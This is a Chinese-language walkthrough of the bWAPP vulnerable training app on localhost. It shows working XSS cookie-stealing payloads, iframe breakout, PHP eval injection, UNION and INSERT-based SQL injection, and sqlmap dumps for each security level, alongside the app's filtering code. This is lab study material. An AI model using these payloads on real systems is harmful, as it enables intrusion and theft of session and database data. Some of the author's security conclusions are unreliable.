bWAPP

bWAPP

HTML Injection - Reflected (GET)

low

bWAPP先随便输入,查看回显

bWAPP继续测试,输入First name:<p>111</p>; Last name:1
bWAPP
查看回显,说明代码被解析

尝试输入js代码First name:<script>alert(document.cookie)</script>; Last name:1

bWAPP出现弹窗,获得cookie

medium

尝试输入js代码First name:<script>alert(document.cookie)</script>; Last name:1
bWAPP可以看到没有被解析,查看源码发现尖括号被替换了
我们尝试将尖括号编码,输入%3cscript%3ealert(document.cookie)%3c/script%3e,弹窗成功
bWAPP

high

输入<script>alert(document.cookie)</script>,发现没有被解析
抓包查看,发现尖括号和圆括号均被编码了
bWAPP查看源码

function xss_check_3($data, $encoding = "UTF-8")
{

    // htmlspecialchars - converts special characters to HTML entities    
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'  
    
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
       
}

可以看到预定义的字符都被转换为实体,安全

HTML Injection - Reflected (POST)

与上一关一样,传参方式由GET改为POST

HTML Injection - Reflected (URL)

low

bWAPP
尝试在url中构造语句
bWAPP
尝试在URL栏里直接构造xss,可以看到<>尖括号被编码了
bWAPP
尝试通过抓包修改URL,成功
bWAPP

menium&high

查看源码

switch($_COOKIE["security_level"])
{

    case "0" :

        // $url = "http://" . $_SERVER["HTTP_HOST"] . urldecode($_SERVER["REQUEST_URI"]);
        $url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];               
        break;

    case "1" :

        $url = "<script>document.write(document.URL)</script>";
        break;

    case "2" :

        $url = "http://" . $_SERVER["HTTP_HOST"] . xss_check_3($_SERVER["REQUEST_URI"]);
        break;

    default :

        // $url = "http://" . $_SERVER["HTTP_HOST"] . urldecode($_SERVER["REQUEST_URI"]);
        $url = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];               
        break;

}

安全,无法绕过

HTML Injection - Stored (Blog)

low

随便输入,查看回显
bWAPP
输入<h1>111</h1>,查看回显,可以看到代码被解析了
bWAPP
输入<script>alert(document.cookie)</script>,成功弹窗,获得cookie
bWAPP

menium&&high

查看源码

    switch($_COOKIE["security_level"])
    {

        case "0" :

            $data = sqli_check_3($link, $data);
            break;

        case "1" :

            $data = sqli_check_3($link, $data);
            // $data = xss_check_4($data);
            break;

        case "2" :

            $data = sqli_check_3($link, $data);
            // $data = xss_check_3($data);
            break;

        default :

            $data = sqli_check_3($link, $data);
            break;

    }
function sqli_check_3($link, $data)
{
   
    return mysqli_real_escape_string($link, $data);
    
}

mysqli_real_escape_string()转义sql语句中使用字符串中的特殊字符

iFrame Injection

IFRAME是HTML标签,作用是文档中的文档,或者浮动的框架(FRAME)。iframe元素会创建包含另外一个文档的内联框架(即行内框架)。

查看源码

function xss($data)
{

    switch($_COOKIE["security_level"])
    {

        case "0" :

            $data = no_check($data);      
            break;

        case "1" :

            $data = xss_check_4($data);
            break;

        case "2" :

            $data = xss_check_3($data);
            break;

        default :

            $data = no_check($data);
            break;   

    }
function xss_check_3($data, $encoding = "UTF-8")
{

    // htmlspecialchars - converts special characters to HTML entities    
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'  
    
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
       
}

function xss_check_4($data)
{
  
    // addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.
    // These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
    // Do NOT use this for XSS or HTML validations!!!
    
    return addslashes($data);
    
}

low

bWAPP

直接修改ParamUrl:http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=https://www.baidu.com&ParamWidth=250&ParamHeight=250
bWAPP

menium

查看源码

function xss_check_4($data)
{
  
    // addslashes - returns a string with backslashes before characters that need to be quoted in database queries etc.
    // These characters are single quote ('), double quote ("), backslash (\) and NUL (the NULL byte).
    // Do NOT use this for XSS or HTML validations!!!
    
    return addslashes($data);

在php中,addslashes()函数是对输入字符串中的某些预定义字符前添加反斜杠;

if($_COOKIE["security_level"] == "1" || $_COOKIE["security_level"] == "2")
{
?>
    <iframe frameborder="0" src="robots.txt" height="<?php echo xss($_GET["ParamHeight"])?>" width="<?php echo xss($_GET["ParamWidth"])?>"></iframe>
<?php

else
{
?>
    <iframe frameborder="0" src="<?php echo xss($_GET["ParamUrl"])?>" height="<?php echo xss($_GET["ParamHeight"])?>" width="<?php echo xss($_GET["ParamWidth"])?>"></iframe>
<?php
}
?>

直接修改ParamUrl的值时,页面没反应,现在尝试从后面着手。根据上面的代码可猜测,在width后面插入</iframe>将前面的闭合,然后插入xss

http://127.0.0.1/bWAPP/bWAPP/iframei.php?ParamUrl=robots.txt&ParamWidth=250"></iframe><script>alert(/xss/)</script>&ParamHeight=250
bWAPP

high

查看源码

function xss_check_3($data, $encoding = "UTF-8")
{

    // htmlspecialchars - converts special characters to HTML entities    
    // '&' (ampersand) becomes '&amp;' 
    // '"' (double quote) becomes '&quot;' when ENT_NOQUOTES is not set
    // "'" (single quote) becomes '&#039;' (or &apos;) only when ENT_QUOTES is set
    // '<' (less than) becomes '&lt;'
    // '>' (greater than) becomes '&gt;'  
    
    return htmlspecialchars($data, ENT_QUOTES, $encoding);
       
}

htmlspecialchars会将预定义的字符(&,’,",<,>)转换为 HTML 实体,无法过滤,是安全的。

PHP Code Injection

low

bWAPP

点击masage后,出现test
URL从http://127.0.0.1/bWAPP/bWAPP/phpi.php变成http://127.0.0.1/bWAPP/bWAPP/phpi.php?message=test,改变一下massage的值为:http://127.0.0.1/bWAPP/bWAPP/phpi.php?message=phpinfo()后出现PHP版本信息
bWAPP

<div id="main">

    <h1>PHP Code Injection</h1>

    <p>This is just a test page, reflecting back your <a href="<?php echo($_SERVER["SCRIPT_NAME"]);?>?message=test">message</a>...</p>
    
<?php

if(isset($_REQUEST["message"]))
{

    // If the security level is not MEDIUM or HIGH
    if($_COOKIE["security_level"] != "1" && $_COOKIE["security_level"] != "2")
    {

?>
    <p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>
    //low级别直接输出massage

<?php

    }

    // If the security level is MEDIUM or HIGH
    else
    {
?>
    <p><i><?php echo htmlspecialchars($_REQUEST["message"], ENT_QUOTES, "UTF-8");;?></i></p>

<?php

    }

}

?>
</div>

查看源代码,发现low级别直接输出massage,menium或者high级别使用htmlspecialchars函数

SQL Injection (GET/Search)

low

' or 1=1 --
' order by 7 --
' union select1,2,3,4,5,6,7 --:2,3,4,5有回显
bWAPP

' union select 1,user(),database(),4,5,6,7 --
bWAPP

SQL Injection (GET/Select)

low

movie=1 and 1=1 &action=go回显正常
movie=1 and 1=2 &action=go报错
movie=1 order by 7 &action=go
movie=0 union select 1,2,3,4,5,6,7 &action=go,查看回显位置为2,3,4,5
bWAPP

movie=0 union select 1,user(),database(),4,5,6,7 &action=go
bWAPP

menium&high

查看源码

function sqli($data)
{
         
    switch($_COOKIE["security_level"])
    {
        
        case "0" : 
            
            $data = no_check($data);            
            break;
        
        case "1" :
            
            $data = sqli_check_2($data);
            break;
        
        default : 
            
            $data = no_check($data);            
            break;   

    }
function sqli_check_1($data)
{
   
    return addslashes($data);
    
}

function sqli_check_2($data)
{
   
    return mysql_real_escape_string($data);
    
}

整数型注入, 对于字符型注入的防御策略并不起作用:
同low

SQL Injection (POST/Search)

low

同SQL Injection (GET/Search)

menium&high

    switch($_COOKIE["security_level"])
    {

        case "0" :

            $data = no_check($data);
            break;

        case "1" :

            $data = sqli_check_1($data);
            break;

        case "2" :

            $data = sqli_check_2($data);
            break;

        default :

            $data = no_check($data);
            break;

    }
function sqli_check_1($data)
{
   
    return addslashes($data);
    
}

function sqli_check_2($data)
{
   
    return mysql_real_escape_string($data);
    
}

分别用了addslashes()和mysql_real_escape_string()函数防御:

SQL Injection (POST/Select)

low

bWAPP
movie=1 and 1=1 &action=go
movie=1 order by 7&action=go
movie=0 union select 1,2,3,4,5,6,7 &action=go
movie=0 union select 1,user(),database(),4,5,6,7 &action=go
bWAPP

SQL Injection (AJAX/JSON/jQuery)

简介

AJAX是一种用于创建快速动态网页的技术。通过在后台与服务器进行少量数据交换,AJAX 可以使网页实现异步更新。这意味着可以在不重新加载整个网页的情况下,对网页的某部分进行更新。
AJAX = 异步 JavaScript 和 XML

low

 <script>

        $("#title").keyup(function(){
            // Searches for a movie title
            var search = {title: $("#title").val()};

            // AJAX call
            $.getJSON("sqli_10-2.php", search, function(data){
                init_table();
                // Constructs the table from the JSON data
                var total = 0;
                $.each(data, function(key, val){
                    total++;
                    $("#table_yellow tr:last").after("<tr><td>" + val.title + "</td><td align='center'>" + val.release_year + "</td><td>" + val.main_character + "</td><td align='center'>" + val.genre + "</td><td align='center'><a href='http://www.imdb.com/title/" + val.imdb + "' target='_blank'>Link</a></td></tr>");
                });
                // Empty result
                if (total == 0)
                {
                    $("#table_yellow tr:last").after("<tr height='30'><td colspan='5' width='580'>No movies were found!</td></tr>");
                }
            })

        });

SQL Injection - Stored (Blog)

存储型xss

low

  • 先尝试输入<h>11111</h>,发现有回显
    bWAPP

  • 尝试输入js语句<script>alert(/xss/)</script>
    成功跳出弹窗
    bWAPP

  • 查看源码,看到有以下三个参数
    bWAPP

  • 代码审计:

    if(isset($_POST["blog"]))//如果blog通过post传参后有值
            {
    
                $entry = sqli($_POST["entry"]);//此时传参进来的值赋给entry
                $owner = $_SESSION["login"];
    
                if($entry == "")
                {
    
                    $message =  "<font color=\"red\">Please enter some text...</font>";
    
                }
    
                else
                {
    				//此时新增加的三个blog的值(一一对应)
                    $sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";
    
                    $recordset = $link->query($sql);
    
                    if(!$recordset)
                    {
    
                        die("Error: " . $link->error . "<br /><br />");
    
                    }
    
                    // Debugging
                    // echo $sql;
    
                    $message = "<font color=\"green\">The entry was added to our blog!</font>";
    
                }
    
            }
    

    burpsuite抓包,然后右键send to repeater
    给参数entry赋值为1',看到有SQL的报错,说明这里是存在SQL注入的
    bWAPP注意这行代码$sql = "INSERT INTO blog (date, entry, owner) VALUES (now(),'" . $entry . "','" . $owner . "')";
    尝试输入entry=1',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#&blog=add
    其中1'与之前的时间data()闭合; (select group_concat(table_name) from information_schema.tables where table_schema='bWAPP')是一个整体,赋值给entry; 这之后的一个右括号)与VALUES的左括号闭合,这个时候
    页面回显成功,说明注入成功,然后用#把后面的内容注释掉

medium&high

  • 查看源码,发现使用了addslashes()函数,所以不能使用""
    function sqli_check_2($data)
    {
        return mysql_real_escape_string($data);
    }
    function sqli_check_3($link, $data)
    {
        return mysqli_real_escape_string($link, $data);
    }
    
  • 尝试输入<script>alert(/xss/)</script>,回显成功。

SQL Injection - Stored (SQLite)

查看sqlite语法点这里

low

尝试输入js语句<script>alert(/xss/)</script>,弹窗成功
bWAPP查看源代码

if(isset($_POST["entry_add"]))
        {

            $entry = sqli($_POST["entry"]);
            $owner = $_SESSION["login"];

            if($entry == "")
            {

                $message =  "<font color=\"red\">Please enter some text...</font>";

            }

            else
            {

                $db = new PDO("sqlite:".$db_sqlite);

                $sql = "SELECT max(id) as id FROM blog;";

                $recordset = $db->query($sql);

		$row = $recordset->fetch();

		$id = $row["id"];

                $sql = "INSERT INTO blog (id, date, entry, owner) VALUES (" . ++$id . ",'" . date('Y-m-d', time()) . "','" . $entry . "','" . $owner . "');";

		$db->exec($sql);

                $message = "<font color=\"green\">The entry was added to our blog!</font>";

            }

        }

SQL Injection - Stored (User-Agent)

low

bWAPP
点击download,可以查看日志
bWAPP
查看源码

$ip_address = $_SERVER["REMOTE_ADDR"];
$user_agent = $_SERVER["HTTP_USER_AGENT"];

// Writes the entry into the database
$sql = "INSERT INTO visitors (date, user_agent, ip_address) VALUES (now(), '" . sqli($user_agent) . "', '" . $ip_address . "')";

$recordset = $link->query($sql);

if(!$recordset)
{

    die("Error: " . $link->error);

}

// Writes the entry into a text file
$line = "'" . date("y/m/d G.i:s", time()) . "', '" . $ip_address . "', '" . xss($user_agent) . "'" . "\r\n";     

$fp = fopen("logs/visitors.txt", "a");
fputs($fp, $line, 200);
fclose($fp);

// Selects all the records
$sql = "SELECT * FROM visitors ORDER by id DESC LIMIT 3";

$recordset = $link->query($sql);

if(!$recordset)
{

    die("Error: " . $link->error);

}

抓包,修改User-Agent
输入1',发现报错

bWAPPUser-Agent:1',(select group_concat(table_name) from information_schema.tables where table_schema='bWAPP'))#

bWAPP

SQL Injection - Blind - Boolean-Based

low

布尔盲注
' or 1=1 #
bWAPP利用sqlmap工具的使用点这里

  • 先利用burpsuite获取cookie

  • 获取数据库信息
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --dbs
    bWAPP

  • 获取当前数据库名称
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --current-db
    bWAPP

  • 查看数据库中的所有表
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp --tables
    bWAPP

  • 查看bwapp数据库的movies表中所有的字段
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp -T movies --columns
    bWAPP

  • 查看movies表中的id字段的所有信息
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_4.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch -D bwapp -T movies -C genre --dump
    (扫的时间太长,不扫了)

medium

使用addslashes()函数:

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。

预定义字符是:

    单引号(')
    双引号(")
    反斜杠(\)
    NULL

提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

注释:默认地,PHP 对所有的 GET、POST 和 COOKIE 数据自动运行 addslashes()。
	 所以您不应对已转义过的字符串使用 addslashes(),因为这样会导致双层转义。
     遇到这种情况时可以使用函数 get_magic_quotes_gpc() 进行检测。

安全

high

使用mysql_real_escape_string()函数:

转义 SQL 语句中使用的字符串中的特殊字符。
下列字符受影响:
    \x00
    \n
    \r
    \
    '
    "
    \x1a

如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

安全

SQL Injection - Blind - Time-Based

low

  • 获取数据库信息
    python sqlmap.py -u "http://127.0.0.1/bWAPP/bWAPP/sqli_15.php?title=1&action=search" --cookie="BEEFHOOK=8aJKFt8lH6h0C2F82Cfa1nOVirkZOOMrDloijxhSls4gnWNGD0jAusg8SfXtS3nvuXJWFQjT2OI0j83Z; security_level=0; PHPSESSID=b5see3d6pc3mcm3pi5a0a4rnr5" --batch --dbs
    bWAPP
    利用sqlmap,跟上面步骤一样
上一篇:【JAVA使用】Mybatis Plus调用Oracle存储过程


下一篇:漫谈Nuclear Web组件化入门篇